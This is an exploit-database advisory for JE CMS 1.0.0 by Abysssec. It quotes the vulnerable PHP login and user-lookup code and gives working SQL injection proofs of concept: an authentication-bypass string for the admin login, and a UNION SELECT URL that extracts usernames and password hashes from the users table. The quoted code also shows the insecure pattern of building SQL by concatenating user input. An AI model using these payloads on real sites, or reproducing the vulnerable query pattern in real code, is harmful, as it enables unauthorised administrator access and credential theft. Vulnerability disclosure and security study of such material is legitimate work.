JE CMS 1.0.0 Bypass Authentication by SQL Injection Vulnerability

2010-09-29T00:00:00
ID 1337DAY-ID-14253
Type zdt
Reporter Abysssec
Modified 2010-09-29T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            =================================================================
JE CMS 1.0.0 Bypass Authentication by SQL Injection Vulnerability
=================================================================


Title  : JE CMS 1.0.0 Bypass Authentication by SQL Injection Vulnerability
Affected Version : JE CMS <= 1.0.0
Vendor  Site   : joenasejes.cz.cc
Discovery : abysssec.com
   
  
Vulnerabilites :
 
1. Bypass Authentication by SQL Injection Vulnerability
 
in administrator\login.php page, lines 16-20:
if (isset($_REQUEST['username'])) {
    $username = $_REQUEST['username'];
    $password = $_REQUEST['password'];
    $result = $core->userLogin();
     
     
userLogin() function is in administrator\library\functions.php. in lines 129-139:
        if ($userName == '' || $password == '') {
            $errorMessage = JE_MISMATCH_USERNAME_PASSWORD;
        }  else {
            // check the database and see if the username and password combo do match
            $sql = "SELECT userid
                    FROM users
                    WHERE username = '".$userName."'        // vulnerability is here
                    AND password = '".$this->getHash($password)."'   // vulnerability is here
                    AND usertype = 1
                    AND block = 0";
            $result = $this->JEQuery($sql);
 
POC:
 
in administrator/login.php:
 
username: admin' or '1'='1
password: admin' or '1'='1
 
2. SQL injection in administrator\index.php on "userid" parameter:
 
in administrator\index.php file line 12:
$userid         =   $_REQUEST['userid'];
lines 52-53:
    case 'edituser' :
        $user = $core->getUser($userid);
         
getUser function is in administrator\library\functions.php file. lines 578-583:
 
    function getUser($id){
         
        $sql = "SELECT *
                FROM users
                WHERE userid = ".$id;   // vulnerability is here
        $result = $this->JEQuery($sql);
 
POC:
 
http://site/joenas-ejes/administrator/index.php?jepage=edituser&userid=1 and 1=2 UNION SELECT 1,2,3,4,group_concat(username,0x3a,password),6,7,8,9,10,11,12 from users--



#  0day.today [2018-02-16]  #